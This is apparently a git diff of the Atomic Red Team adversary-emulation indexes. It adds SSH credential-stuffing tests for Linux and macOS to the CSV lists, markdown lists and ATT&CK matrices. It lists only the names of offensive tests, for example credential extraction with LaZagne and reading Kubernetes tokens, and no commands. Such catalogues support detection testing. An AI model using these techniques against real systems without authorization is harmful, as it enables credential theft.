53.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e9d78206..d701f7c6 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -5,6 +5,8 @@ credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b- credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell +credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash +credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index c9e1bb22..cd372f79 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -4,6 +4,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Lo credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh +credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 721cf97b..e9e50ace 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -1,5 +1,6 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh +credential-access,T1110.004,Credential Stuffing,2,SSH Credential Stuffing From MacOS,d546a3d9-0be5-40c7-ad82-5a7d79e1b66b,bash credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index bd9b1af6..586ecb2f 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -15,7 +15,9 @@ - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md) - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #1: SSH Credential Stuffing From Linux [linux] + - Atomic Test #2: SSH Credential Stuffing From MacOS [macos] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] - Atomic Test #2: Extract passwords with grep [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 678b261a..7df32bb9 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -11,7 +11,8 @@ - [T1552.007 Container API](../../T1552.007/T1552.007.md) - Atomic Test #1: ListSecrets [macos, linux] - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux] -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #1: SSH Credential Stuffing From Linux [linux] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #2: Extract passwords with grep [macos, linux] - Atomic Test #5: Find and Access Github Credentials [macos, linux] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 215f549a..65e062d0 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -4,7 +4,8 @@ - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md) + - Atomic Test #2: SSH Credential Stuffing From MacOS [macos] - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md) - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos] - Atomic Test #2: Extract passwords with grep [macos, linux] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 33891a6e..a6c4f9c7 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -7,7 +7,7 @@ | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | [At (Linux)](../../T1053.001/T1053.001.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index b4352dce..9d447e38 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md @@ -4,7 +4,7 @@ | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index acd405f4..bdd2eed9 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -10,7 +10,7 @@ | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email 